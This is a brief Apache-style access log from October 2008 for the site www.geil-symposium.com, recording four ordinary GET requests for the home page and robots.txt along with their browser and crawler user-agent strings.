208.80.194.31 - - [05/Oct/2008:11:51:24 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {3D427E3C-03AA-680E-181A-188DDD3E58E4}; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; PeoplePal 3.0; PeoplePal 6.2)" 0 www.geil-symposium.com
64.246.165.237 - - [05/Oct/2008:12:43:37 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
69.58.178.35 - - [05/Oct/2008:16:55:12 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" 0 www.geil-symposium.com
69.58.178.35 - - [05/Oct/2008:16:55:13 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" 0 www.geil-symposium.com
